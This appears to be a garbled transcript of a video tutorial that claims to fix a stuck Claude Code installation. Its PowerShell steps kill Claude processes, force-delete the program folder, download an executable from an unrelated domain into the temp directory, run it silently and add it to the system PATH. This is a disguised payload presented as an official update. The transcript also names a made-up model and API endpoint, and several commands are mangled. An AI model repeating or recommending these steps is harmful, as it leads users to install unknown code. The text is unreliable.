In this video, you'll learn how to resolve the installation issue when the Claude Code installation gets stuck. This guide will provide you with a step-by-step process to unstick the installation and ensure that you have the latest version properly set up. To begin, you need to stop any stuck installer immediately. Open your command line interface and type the command get process-name Claude-error action silently continue for each object $_. Kill. This command will terminate any active processes related to Claude, effectively stopping the installation. Next, you will want to remove any leftover installation folders that may be causing conflicts. Execute the command remove item C program files Claude-recurse-force error action silently continue. This command deletes the existing Claude folder, ensuring a clean slate for the new installation. Now it is time to download the latest Claude CLI version for 2026 directly. Run the command invoke web request https://downloads.k.ax/cli.axe-out file $nverd-tmp-poltload.exe. This downloads the installation file to your temporary directory, preparing it for the next step. Once the download is complete, you can install it silently to avoid any interruptions. Use the command start process $nv-tmport.exe-argument list/silent directory without requiring user input. After the installation completes, you will need to add Claude to your system's path for both the current session and permanently. First, $end path += C program files Claude. Then execute environment set environment variable path $endmachine path $endmachine. This configuration allows you to run the Claude command from any command line. To confirm that the installation was successful, type Claude-V in your command line. If everything is set up correctly, this command should return the CLI version and the default model, indicating that Claude is functioning as intended. As an optional step, you can test a quick API call to ensure everything's operational. Run the command $response = invoke REST method set https://api.cap2026/completions -method post-body and model = Claude 2026 alaf input = test installation convert to JSON-content type application/JSON. You can then check the output by typing $response output _text. This will validate that the API is responding correctly. That wraps up today's guide. Thanks for watching and catch you in the next tutorial.